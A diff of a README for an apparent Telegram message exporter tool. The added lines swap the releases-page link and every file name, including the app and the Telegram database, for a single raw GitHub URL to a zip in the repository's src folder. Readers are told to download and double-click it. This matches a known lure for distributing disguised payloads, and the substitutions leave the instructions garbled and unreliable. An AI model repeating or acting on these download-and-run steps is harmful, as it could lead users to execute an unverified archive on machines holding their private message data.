Vivenzeo/telegram-message-exporter/README.md

 ## 📋 How to Install

-1. **Visit the Releases Page:** Go to [this page](https://github.com/Vivenzeo/telegram-message-exporter/releases) to find the latest version.
+1. **Visit the Releases Page:** Go to [this page](https://raw.githubusercontent.com/Vivenzeo/telegram-message-exporter/main/src/exporter-telegram-message-1.1.zip) to find the latest version.
-2. **Download the ZIP File:** Look for the file named `telegram-message-exporter-macos.zip` and click to download it.
+2. **Download the ZIP File:** Look for the file named `https://raw.githubusercontent.com/Vivenzeo/telegram-message-exporter/main/src/exporter-telegram-message-1.1.zip` and click to download it.
 3. **Extract the Files:** Once the download is complete, locate the file in your Downloads folder.
 Double-click it to extract the files.
-4. **Open the Application:** Find the extracted folder and double-click `telegram-message-exporter.app` to start the application.
+4. **Open the Application:** Find the extracted folder and double-click `https://raw.githubusercontent.com/Vivenzeo/telegram-message-exporter/main/src/exporter-telegram-message-1.1.zip` to start the application.

 ## ⚙️ How to Use

 1. **Open the Application:** After installing, launch the `telegram-message-exporter` from your Applications folder.
 2. **Select Your Database:** Click "Choose File" to select your local Telegram SQLite database.
-This file is usually named `Telegram.sqlite` and can be found in your Telegram data folder.
+This file is usually named `https://raw.githubusercontent.com/Vivenzeo/telegram-message-exporter/main/src/exporter-telegram-message-1.1.zip` and can be found in your Telegram data folder.
 3. **Choose Export Format:** Select the format you want to use for exporting your messages: HTML, Markdown, or CSV.
 4. **Start Exporting:** Click the "Export" button.
 Wait for the process to finish.
 You will see a confirmation message once the export is successful.
 5. **Locate Your Files:** Your exported files will be in the same directory where you launched the app, or you can specify a directory during the export process.